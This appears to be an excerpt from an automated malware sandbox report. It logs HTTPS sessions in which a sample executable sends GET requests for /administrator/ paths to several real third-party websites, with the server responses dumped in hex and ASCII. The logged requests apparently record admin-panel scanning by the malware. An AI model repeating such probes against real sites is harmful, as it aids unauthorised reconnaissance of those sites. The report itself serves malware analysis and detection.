                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    71192.168.2.456241172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC177OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC633INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 65 73 6f 66 74 2e 61 63 61 64 65 6d 79 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeLocation: https://esoft.academy/administratorCF-Cache-Status: DYNAMICReport-To: {"endpoint
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC424INData Raw: 31 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 7d 0a 20 20 20 20 2e 65 72 72 6f 72 20 7b 63 6f 6c 6f 72 3a 20 23 65 30 30 3b 7d 0a 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 7d 0a 20 20 20 20 68 31 20 7b 66
                                                                                                                                                                                                    Data Ascii: 1a1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title><style> body {margin: 20px; font-family: helvetica, sans-serif; max-width: 800px;} .error {color: #e00;} pre {font-size: 16px;} h1 {f
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 1
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    72192.168.2.45628054.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: Apache/2.4.52 (Ubuntu)vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=ut
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC7930INData Raw: 35 38 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61
                                                                                                                                                                                                    Data Ascii: 5836<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Pa
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC14658INData Raw: 52 65 73 65 61 72 63 68 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 64 75 63 61 74 69 6f 6e 61 6c 2d 73 6f 6c 75 74 69 6f 6e 73 2d 70 61 67 65 2f 6d 61 6b 65 72 73 70 61 63 65 2f 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 77 68 69 74 65 20 61 6c 69 67 6e 2d 63 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 62 74 6e 2d 74 65 78 74 22 3e 4d 61 6b 65 72 73 70 61 63 65 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: Research Solutions</p></a><a href="/educational-solutions-page/makerspace/" class="btn white align-c"><p class="btn-text">Makerspace</p></a></div></div></div>
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    73192.168.2.456215144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1483INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 47 45 54 2c 50 4f 53 54 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 20 41
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Access-Control-Allow-Methods: GET,POSTAccess-Control-Allow-Headers: Content-Type, A
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6709INData Raw: 33 39 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45
                                                                                                                                                                                                    Data Ascii: 391a<!DOCTYPE html><html lang="es-MX"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://gruporegiosafety.com/xmlrpc.php" /><script type="text/javascript">document.documentE
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC7915INData Raw: 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72
                                                                                                                                                                                                    Data Ascii: global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--pr
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC8192INData Raw: 31 66 34 30 0d 0a 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76
                                                                                                                                                                                                    Data Ascii: 1f40-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-viv
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC7822INData Raw: 65 66 74 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 61 66 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6c 65 66 74 3a 31 65 6d 7d 2e 65 74 5f 62 75 74 74 6f 6e 5f 69 63 6f 6e 5f 76 69 73 69 62 6c 65 2e 65 74 5f 62 75 74 74 6f 6e 5f 6c 65 66 74 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 2c 2e 65 74 5f 62 75 74 74 6f 6e 5f 6c 65 66 74 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 65 74 5f 62 75 74 74 6f 6e 5f 6c 65 66 74 20 2e 65 74 5f 70 62 5f 6d 6f 64 75 6c 65 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 37 65 6d 7d 2e 65 74 5f 62 75 74 74 6f 6e 5f 69 63 6f 6e 5f 76 69 73 69 62 6c 65 2e 65 74 5f 62 75 74 74 6f 6e
                                                                                                                                                                                                    Data Ascii: eft .et_pb_button:after{margin-left:0;left:1em}.et_button_icon_visible.et_button_left .et_pb_button,.et_button_left .et_pb_button:hover,.et_button_left .et_pb_module .et_pb_button:hover{padding-left:2em;padding-right:.7em}.et_button_icon_visible.et_button
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC8192INData Raw: 31 66 34 30 0d 0a 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 23 65 74 2d 61 6a 61 78 2d 73 61 76 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74
                                                                                                                                                                                                    Data Ascii: 1f40-webkit-box-sizing:border-box;box-sizing:border-box;direction:ltr}#et-ajax-saving{display:none;-webkit-transition:background .3s,-webkit-box-shadow .3s;transition:background .3s,-webkit-box-shadow .3s;transition:background .3s,box-shadow .3s;transit
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC7822INData Raw: 79 3a 30 7d 68 65 61 64 65 72 2e 65 74 2d 6c 2e 65 74 2d 6c 2d 2d 68 65 61 64 65 72 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 22 22 7d 2e 65 74 5f 70 62 5f 6d 6f 64 75 6c 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 32 73 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 42 6f 74 74 6f 6d 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30
                                                                                                                                                                                                    Data Ascii: y:0}header.et-l.et-l--header:after{clear:both;display:block;content:""}.et_pb_module{-webkit-animation-timing-function:linear;animation-timing-function:linear;-webkit-animation-duration:.2s;animation-duration:.2s}@-webkit-keyframes fadeBottom{0%{opacity:0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    74192.168.2.45627215.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC15911INData Raw: 37 39 37 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 7973<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC15193INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/">


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    75192.168.2.45629445.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
